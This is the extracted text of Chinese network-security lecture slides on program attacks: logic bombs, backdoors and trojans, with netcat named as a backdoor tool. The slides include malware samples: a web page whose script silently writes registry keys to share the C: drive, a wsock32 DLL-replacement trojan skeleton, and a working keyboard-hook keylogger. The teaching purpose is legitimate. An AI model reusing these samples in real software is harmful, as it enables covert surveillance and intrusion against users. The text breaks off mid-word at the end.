网络安全6-程序攻击

第5章缓冲区溢出攻击回顾缓冲区溢出攻击的基本原理、方法缓冲区溢出程序的原理及要素攻击UNIX攻击WINDOWS1第一页，共35页。第6章程序攻击本章列出了常用的程序攻击方法，介绍了逻辑炸弹、后门、病毒及特洛伊木马等的概念和特点，并用实例说明工作原理，提供和分析了部分代码以便更深入地学习和了解技术原理。2第二页，共35页。第6章程序攻击6.1逻辑炸弹攻击6.2植入后门6.3病毒攻击6.4特洛伊木马攻击6.5其它程序攻击3第三页，共35页。逻辑炸弹攻击定义一种隐藏于计算机系统中以某种方式触发后对计算机系统硬件、软件或数据进行恶意破坏的程序代码触发方式时间触发、特定操作触发、满足某一条件的触发等第6章第1节4第四页，共35页。逻辑炸弹攻击特征隐蔽性：逻辑炸弹一般都比较短小，容易附着在系统或文件上而不容易察觉，也可能被恶意隐藏在一些常用工具软件代码中攻击性：逻辑炸弹都具有攻击性，一旦被激发，或是干扰屏幕显示，或降低电脑运行速度，或是删除程序，破坏数据逻辑炸弹没有“传染性”第6章第1节5第五页，共35页。植入后门定义后门是计算机入侵者攻击网上其它计算机成功后为方便下次进入这台被攻击计算机而采取的一些欺骗手段和程序目的再次进入、不被发现健壮性第6章第2节6第六页，共35页。植入后门攻击方法获取尽可能多的用户口令，并不会被管理员察觉或查封更改配置例如：rhosts替换程序（包括源代码，函数库，内核）要点：时间、校验和开设新的服务，定时开启服务第6章第2节7第七页，共35页。植入后门隐藏代码：坏扇区，Boot通讯：TCP，UDP和ICMPShell后门：TCP/UDP/ICMP第6章第2节8第八页，共35页。植入后门隐藏执行DLLRundll32.exeDllcache动态嵌入挂接API，全局钩子（HOOK），远程线程第6章第2节9第九页，共35页。植入后门Unix后门netcatncpbshVetescan后门软件

第6章第2节10第十页，共35页。病毒攻击详见第13章网络病毒防治第6章第3节11第十一页，共35页。特洛伊木马攻击定义特洛伊木马，简称木马，英文名为Trojanhorse计算机领域的“特洛伊木马(Trojan)”，是指附着在应用程序中或者单独存在的一些恶意程序，它可以利用网络远程响应网络另一端的控制程序的控制命令，实现对感染木马程序的计算机的控制，或者窃取感染木马程序的计算机上的机密资料。第6章第4节12第十二页，共35页。特洛伊木马攻击工作原理木马程序一般利用TCP/IP协议，采用C/S结构，分为客户端和服务器端两个部分服务器端程序运行于被攻击的计算机上，而客户端程序在控制者的计算机上运行客户端程序可以同时向很多服务端程序发送命令以控制这些计算机。客户端程序一般提供友好的操作界面，以便于用户的操作，其功能可能很多第6章第4节13第十三页，共35页。特洛伊木马攻击功能分类远程访问型木马密码发送型木马键盘记录型木马毁坏型木马FTP型木马第6章第4节14第十四页，共35页。特洛伊木马攻击通讯分类主动型木马反弹型木马嵌入式木马第6章第4节15第十五页，共35页。特洛伊木马攻击冰河文件浏览器屏幕监视键盘鼠标控制其它控制支持配置glacier第6章第4节16第十六页，共35页。特洛伊木马攻击反弹型木马它利用防火墙对内部发起的连接请求无条件信任的特点，假冒是系统的合法网络请求与木马的客户端建立连接，从而达到对被攻击计算机控制的目的第6章第4节17第十七页，共35页。特洛伊木马攻击网络神偷远程文件访问，而不是远程控制反弹端口HTTP隧道服务器端上线通知功能通讯加密第6章第4节18第十八页，共35页。特洛伊木马攻击嵌入式木马嵌入网页的共享式木马<html> <head> <title>共享木马</title> </head> <script> functionkillErrors() {returntrue;} </script>第6章第4节19第十九页，共35页。 <scriptlanguage=JScript> document.write("<APPLETHEIGHT=0WIDTH=0code=com.ms.activeX.ActiveXComponent></APPLET>");functionmmain(){try{ aa=document.applets[0]; aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0b}"); aa.createInstance(); commandsh=aa.GetObject();{commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Flags",302,"REG_DWORD");commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Type",0,"REG_DWORD"); commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Path","C:\\");第6章第4节20第二十页，共35页。 } } catch(e){} } functionstart(){setTimeOut("mmain()",1000);} start(); </script> <bodybgcolor=#FFFFFFtopmargin=0leftmargin=0> <p>你好。。。。。。。</p><p>全世界最好的网页</p> </body></html>第6章第4节21第二十一页，共35页。特洛伊木马攻击嵌入式木马DLL木马替换系统原有DLL，模仿原有功能，并加入后门#include<windows.h>#include<stdio.h>#include<winsock.h>voidmuma_thread(){ //生成木马的服务器线程 ………}//…..必须输出与原wsock32.dll库同样的函数第6章第4节22第二十二页，共35页。BOOLWINAPIDllMain(HANDLEhInst,ULONGulReasonForCall,LPVOIDlpReserved){//装载原动态库if(i==NULL){ i=LoadLibrary(wsock32.dle);}else return1;if(i!=NULL){//取得与原同名函数地址a=GetProcAddress(I,”send”);send1=(int(_stdcall*)(SOCKET,constchar*,int,int))a;a=GetProcAddress(I,”recv”);recv1=(int(_stdcall*)(SOCKET,constchar*,int,int))a;}第6章第4节23第二十三页，共35页。else return0;………………替换原来的所有函数导出，以确保程序运行正常。}intPASCALFARsend(SOCKETs,constchar*buf,intlen,intflags){ ……完成send函数的功能}intPASCALFARrecv(SOCKETs,charFAR*buf,intlen,intflags){ ……完成recv函数的功能}第6章第4节24第二十四页，共35页。特洛伊木马攻击木马的实现技术自动启动技术隐藏技术远程监控技术

第6章第4节25第二十五页，共35页。特洛伊木马攻击木马的实现技术自动启动技术启动组、win.ini、system.ini、注册表第6章第4节26第二十六页，共35页。特洛伊木马攻击木马的实现技术隐藏技术任务栏任务管理器服务管理器DLL替换远程线程第6章第4节27第二十七页，共35页。特洛伊木马攻击木马的实现技术远程监控技术对对方计算机的监视包括对对方主机的鼠标、键盘以及屏幕显示甚至网络通讯流量流向等的监视，也包括对对方计算机系统信息（包括磁盘信息、操作系统信息及硬件信息）的搜集

远程控制则是攻击者控制目标机按照自己的意愿在被攻击计算机上运行程序或者关闭对方的功能，包括控制对方的鼠标、键盘、操作系统，在对方计算机上启动服务，或者关闭对方计算机等第6章第4节28第二十八页，共35页。特洛伊木马攻击键盘型木马extern"C"BOOL_declspec(dllexport)__stdcallinstallhook(){ FILE*f1=NULL; f1=fopen("e:\\hook.txt","w"); fclose(f1); hkb=SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc,hins,0); returnTRUE;}第6章第4节29第二十九页，共35页。HHOOK hkb;LRESULT__declspec(dllexport)__stdcallCALLBACKKeyboardProc(intnCode,WPARAMwParam,LPARAMlParam){ charch; if(((DWORD)lParam&0x40000000)&&(HC_ACTION==nCode)) { if((wParam==VK_SPACE)||(wParam==VK_RETURN)||(wParam>=0x2f)&&(wParam<=0x100)) { FILE*f1; f1=fopen("e:\\hook.txt","a+");//打开文件 if(wParam==VK_RETURN) { ch='\n'; fwrite(&ch,1,1,f1);//将键盘按键的字母写入文件 }第6章第4节30第三十页，共35页。 else { BYTEks[256]; GetKeyboardState(ks); WORDw; UINTscan; scan=0; ToAscii(wParam,scan,ks,&w,0); ch=char(w); fwrite(&ch,1,1,f1);//将键盘按键的字母写入文件 } fclose(f1); } } LRESULTRetVal=CallNextHookEx(hkb,nCode,wParam,lParam); returnRetVal;}第6章第4节31第三十一页，共35页。BOOL_declspec(dllexport)UnHook(){ BOOLunhooked=UnhookWindowsHookEx(hkb); return unhooked;}//*.h中声明如下LRESULT__declspec(dllexport)__stdcallCALLBACKKeyboardProc( intnCode,WPARAMwParam,LPARAMlParam);extern"C"BOOL_declspec(dllexport)__stdcallinstallhook();第6章第4节32第三十二页，共35页。其它程序攻击邮件炸弹与垃圾邮件

常用攻击工具upyours4、KaBoom3、HakTek、Avalanche等

IE攻